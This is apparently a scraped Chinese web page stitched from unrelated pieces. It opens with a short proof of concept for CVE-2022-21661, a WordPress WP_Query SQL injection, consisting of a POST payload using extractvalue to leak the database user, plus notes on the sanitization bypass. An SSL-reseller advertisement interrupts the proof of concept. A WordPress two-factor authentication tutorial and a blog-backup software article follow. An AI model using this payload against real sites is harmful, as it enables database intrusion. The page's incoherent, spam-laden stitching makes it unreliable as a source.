携wordpress的简单介绍
CVE-2022–21661 WordPress 《=5.3, 携带WP_QUERY插件SQL注入
POC:
北关ssl适用于网站、小程序/APP、API接口等需要进行数据传输应用场景,ssl证书未来市场广阔!成为创新互联的ssl证书销售渠道,可以享受市场价格4-6折优惠!如果有意向欢迎电话联系或者加微信:18982081108(备注:SSL证书合作)期待与您的合作!
POST
ecs_ajax_settings {"post_id":1,"current_page":2,"widget_id":"65054a0","max_num_pages":5}
action ecsload
query {"tax_query":{"0":{"field":"term_taxonomy_id","terms":["111) and extractvalue(rand(),concat(0x5e,user(),0x5e))#"]}}
这个问题来源于temrs没过滤 再加上 一个相等条件绕过;
相等条件类似于,下面过滤条件没有执行。导致term携带了一些脏数据
if(a==b){
return;
}
sanialize(term);
1下图所示,我们的插件里action钩子勾住的是这个方法,这个方法利用了WP_QUERY存在漏洞的类,注意的是action 一定要有对应的值,所以这个漏洞限制在。运用了WP_QUERY的插件里。所以我们拿了ajax_pagnition这个插件,定义了action为ecsload
2 下图所示 我们进入方法,此方法构造了sql
3 clean query方法 进去看看,2的里面调用了这个,箭头指定的地方已经打过补丁,强制term为int所以就无法利用了,补丁前不是这样,而是对term没有做任何操作
4进入transform_query,在看一下里面。下面试sanitize其实可以绕过,从而不过滤term这样,条件都成立,term逃出,sql成立
wordpress那个认证怎么改
越来越多的网站支持添加二步认证Two-Factor Authentication以提高安全性,在国内更多是以账号密码+短信码的方式,但海外网站可能更多采用二步认证的方式。
如果你觉得有必要为你的WordPress网站开启二步认证,则可以继续阅读本教程,了解如何使用Google Authenticator或者SMS短信验证码为WordPress添加Two-Factor Authentication。
为什么要为WordPress登录添加二步验证?
黑客使用的最常见的技巧之一称为暴力攻击。通过使用自动化脚本,黑客会尝试猜测正确的用户名和密码以攻入WordPress 网站。
如果他们窃取了密码或准确猜到了密码,则他们可能会用恶意软件感染您的网站,比如挂马、加密数据要挟。
保护WordPress网站免遭密码被盗的最简单方法之一是添加二步认证。这样,即使有人窃取了密码,他们无法跳过使用手机输入安全代码才能访问的步骤。
有多种方法设置WordPress二步认证登录。但是,最安全、最简单的方法是使用身份验证器应用程序。
方法 1. 使用WP 2FA插件添加二步认证(更简单的方法)
方法 2. 使用Two Factor插件添加二步认证
方法 1. 使用WP 2FA插件添加二步认证
这种方法最为简单,推荐大家首选此方法。这个方法很灵活,允许您对所有用户强制执行二步身份验证。
首先,您需要安装并启用WP 2FA – Two-factor Authentication插件。
启用后,您需要访问用户»您的个人资料页面并向下滚动到“WP 2FA Settings”部分。
点击“Configure Two-factor authentication (2FA)”按钮以启动设置向导。
插件将要求您选择一种身份验证方法:
使用您选择的应用程序生成的One-time code(推荐)
通过电子邮件发送给您的One-time code
建议您选择app方式认证,更安全可靠。然后单击下一步按钮继续。
该插件将向您展示一个二维码,您需要使用身份验证器应用(authenticator app)扫描该二维码。
什么是身份验证器应用(Authenticator App)?
身份验证器应用是一种智能手机应用程序,可为您保存在其中的帐户生成一个临时的一次性密码。
基本上,应用和您的服务器使用密钥来加密信息并生成一次性代码,您可以将其用作第二层保护。
有很多这样的应用可以免费使用。
最受欢迎的是Google Authenticator,但它并不是最好的。虽然它工作得很好,但它不提供可以在手机丢失时使用的备份。
我们建议使用Authy,因为它是一个易于使用且免费的应用程序,该应用还允许您以加密格式将您的帐户保存在云中。这样,如果您丢失了手机,则只需输入主密码即可恢复所有帐户。
其他密码管理器(如LastPass、1password等)都带有自己的身份验证器版本,它们都比Google身份验证器要好用得多,因为它们支持恢复密钥。
在本教程中,我们将使用Authy作为示例。
首先,单击身份验证器应用程序中的添加帐户按钮:
然后,该应用程序将请求访问您手机上的相机的权限。您需要允许此权限,以便您可以扫描插件设置页面上显示的二维码。
身份验证器应用现在将保存您的网站帐户,并开始显示可用于登录的一次性密码。
在插件的设置向导中,单击“I’m Ready”按钮继续。
该插件现在会要求您验证一次性密码。只需在身份验证器应用中单击您的帐户,它就会显示一个六位数的一次性密码,输入该密码。
之后,该插件将为您提供生成和保存备份代码的选项。如果您无法使用手机,则可以使用这些代码。您可以打印这些备份代码并将它们保存在安全的地方。
之后,您可以退出设置向导。
为所有WordPress用户设置WP 2-FA两步认证登录
如果您运行多用户WordPress网站,例如会员网站,则该插件还允许您为网站上的所有用户启用或强制执行二步认证登录验证。
只需转到设置»Two-factor Authentication页面即可配置插件设置。
该插件支持为所有用户启用二步认证登录,强制所有用户登录,并给用户足够的时间进行设置。
如果您的WordPress网站使用自定义登录表单页面,那么您还可以创建一个自定义页面,用户无需访问WordPress管理后台即可在其中管理其二步认证身份验证器设置。
不要忘记单击“保存更改”按钮来存储您的新设置。
以下是用户输入常规WordPress密码后,WordPress默认登录界面要求输入二步认证身份验证代码。
方法 2. 使用Two Factor插件添加二步认证
这种方法不太灵活,因为该插件不支持为所有用户强制执行两步认证登录。每个用户都必须自己设置,并且可以从他们的个人资料中禁用它。
首先,您需要安装并启用Two Factor插件。
启用插件后,访问用户»个人资料页面并向下滚动到Two-Factor Options部分。
从这里,您需要选择一个二步认证登录选项。该插件支持使用电子邮件、身份验证器应用和FIDO U2F安全密钥方法。
我们建议使用身份验证器应用方法。只需下载Google Authenticator、Authy 或 LastPass Authenticator等身份验证器应用,然后扫描屏幕上显示的二维码。
扫描二维码后,应用程序将向您显示验证码,您需要在插件选项中输入该验证码,然后单击提交按钮。
该插件现在将设置密钥。您可以随时从设置页面重置此密钥以重新扫描二维码。
不要忘记单击“Update Profile”按钮以保存您的设置。
现在,每次您登录WordPress网站时,系统都会要求您输入手机上应用生成的验证码。
关于WordPress中二步认证 (2FA) 的常见问题
以下是有关在WordPress中使用两步认证登录的一些常见问题的解答。
1. 如果无法访问手机,如何登录?
如果您使用的是带有Authy等云备份选项的身份验证器应用,那么您也可以在笔记本电脑上安装该应用程序。
即使没有随身携带手机,您可以访问身份验证代码。它还支持在购买新手机时恢复您的密钥。
上面提到的两种方法还支持您生成备份代码。当您无法使用手机时,这些代码也可用作一次性密码。
2. 如何不用密码登录?
如果您无权访问手机、笔记本电脑或备用代码,则只能通过禁用该插件来登录。
停用所有插件后,它还将禁用二步身份验证插件,您将能够登录到您的WordPress网站。登录后,您可以重新启用插件并重置二步身份验证设置。
3. 我还需要密码保护WordPress管理文件夹吗?
从使用HTTPS和安全WordPress托管等基础知识开始,当您拥有多层安全保护来保护您的网站时,网站安全效果最佳。二步认证的主要目的是加强WordPress登录安全,但您可以通过密码保护WordPress管理后台使其更加安全。
如果的WordPress网站是一个会员网站、在线商店或在线课程网站,就更应该做二步认证登录。
关于WordPress安全,建议大家可以阅读“如何有效地保护您的WordPress站点免受攻击入侵”和“WordPress网站免费SSL证书申请及配置教程”,来进一步完善WordPress安全防护措施。
原创文章,作者:微想小云,如若转载,请注明出处:
Wordpress下载Wordpress主机推荐Wordpress使用心得Wordpress怎么建站Wordpress插件Wordpress虚拟主机Wordpress问题解决
赞 (0)
生成海报
如何有效地保护您的WordPress站点免受攻击入侵
上一篇2022年 9月 24日 am8:13
如何正确地删除WordPress
博客备份
BlogDown博客备份注意事项
在博客备份过程中,经常会遇到一些问题,例如,何时备份博客?如何备份博客更快?如何导出博客到本地?如何选择备份的文件等等。这其中的一些注意事项可以总结如下:
一、备份时间问题
备份博客一般是隔一段时间就备份一次,但如果是重要价值的博客,例如亲子博客,日志记录等,应该经常性的备份。由于博客经常会有新的文章产生,BlogDown中的增量备份博客功能,可以提供备份的便利,在任何时刻都可以轻松备份最新的博客文章,备份的时候可以只备份新的博客,而不要又把旧的博客备份一遍。
二、备份文件问题
备份后的博客最好做成电子书文件格式保存,这样如果博客出现问题,例如丢失或被关闭,则不会导致更大损失。另外,备份成电子书可以方便阅读收藏,有很多有价值的博客值得永久收藏,例如亲子博客,专业博客等等,可以备份下来后作为资料收藏。另外,BlogDown中word格式的电子书可以用于出书打印,还可以编辑里面的内容,包括文字和图片。
三、电子书格式问题
备份后的博客电子书可以选择很多格式,例如通用电子书chm格式,可以不用其他软件就能打开阅读。还有原始的网页格式html,以及最简单的纯文本格式txt,另外,也可以选择word格式,更加方便编辑和打印。这些格式都各有优点,电子书chm格式比较容易阅读,压缩率较高,方便携带,里面可以带图片。纯文本txt格式不包含图片,但对于文字较多的博客则比较适合。BlogDown中的博客书word格式,里面也可以包含图片,文字和图片是软件自动排版的,导出后就是一本书的感觉,可用于打印出书。
四、博客排版问题
由于每个博客的风格不一样,在网上的博客都有各种模板使用,所以排版都是千变万化,各式各样,彰显了个性,突出了特色。但备份到本地的电子书之后,其格式可能会发生一定的变化。如果是电子书chm格式,则可以保持跟网络上的格式相对一致,因为chm本质显示的是网页格式,所以可以继承在线博客文章的风格,例如颜色,字体,大小,图片尺寸等等。但如果导出为纯文本txt格式,则只保留文字内容,没有图片,其文字的排版是一个问题。由于在线博客的风格各异,段落可能乱七八糟,所以软件会自动对文字进行排版,导出的txt格式会非常工整。更进一步,word格式包括图片,软件会自动对文字和图片混合排版,非常整齐漂亮。
五、微博备份问题
微博的备份跟博客的备份有相同之处,但又有区别。博客内容一般比较长,所以做成电子书后一般作为一篇文章即可,阅读效果较好。但微博的篇幅较短,且量又比较多,所以微博备份更适合用分页的电子书格式,这样把多篇微博放在一页里面,形成翻页风格,保持与在线微博一样的形式。在BlogDown软件里,导出的时候,可以选择分页电子书格式,更加适合微博备份,并且更适合手机或平板电脑阅读。另外,微博备份时没有标题,且没有分类,可以在导出的时候,把分类这项内容去掉。
六、博客离线编辑问题
在线博客都提供了丰富的文章编辑工具,但如果能够离线编辑,则可以提供更加快速和方便的文章编辑功能。在BlogDown软件里,可以选择编辑修改文章按钮,对博客文章的标题,时间,分类以及博客内容进行修改。这样在备份之后,可以对以前发表的博客文章进行再次编辑,例如如果以前发表的文章有错误的地方或者不满意之处,则可以再次编辑,然后再导出。可以编辑多次,在软件里编辑不影响在线博客内容,只是影响导出后的文件。
七、文章部分导出问题
有时不想导出全部文章,而是导出某个分类的文章,或者某个时间段的文章,或者某个关键字的文章。这些问题,在BlogDown软件里都可以实现。导出某个分类的文章,可以对分类排序,只需选择这个分类的文章到临时文章列表,然后导出临时文章列表即可。导出每个时间段文章,选择时间段的多篇文章,可以一次多选,然后同样添加到临时文章列表。如何导出某个关键字的文章,首先查询文章,然后导出查询的结果即可。
网站标题:携wordpress的简单介绍
当前URL:http://ybzwz.com/article/dogsiog.html